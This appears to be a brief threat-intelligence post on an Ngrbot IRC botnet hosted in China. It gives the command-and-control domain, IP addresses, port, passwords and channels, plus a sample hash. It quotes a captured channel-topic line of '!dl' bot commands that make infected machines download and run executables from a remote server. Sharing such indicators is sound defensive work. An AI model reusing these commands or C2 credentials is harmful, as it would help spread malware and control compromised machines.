t.baerr01.com (Ngrbot irc botnet hosted by Chinanet)

Resolved t.baerr01.com to 122.195.244.35, 60.172.229.40, 60.169.73.119, 121.14.212.125, 121.12.123.140, 124.232.150.181, 222.88.194.187

Server:  t.baerr01.com
Port:  6512
Server password:  smart
Channel:  #dpi
:hub.us.com 332 n[US{XPu{pwvvvwa #dpi :!mdns hxxp://146.185.246.192/av.txt !dl hxxp://146.185.246.192/111.exe !dl hxxp://146.185.246.192/brentback.exe !dl hxxp://146.185.246.192/dqw7.exe
Channel:  #tar
Channel password:  smart

A modified ircd is used, making it difficult to connect using a regular irc client.

Related md5s (search on malwr.com to download the samples):
ngrbot: 1704b32f095bffb55c6c0a01f48a83ae

Categories: Uncategorized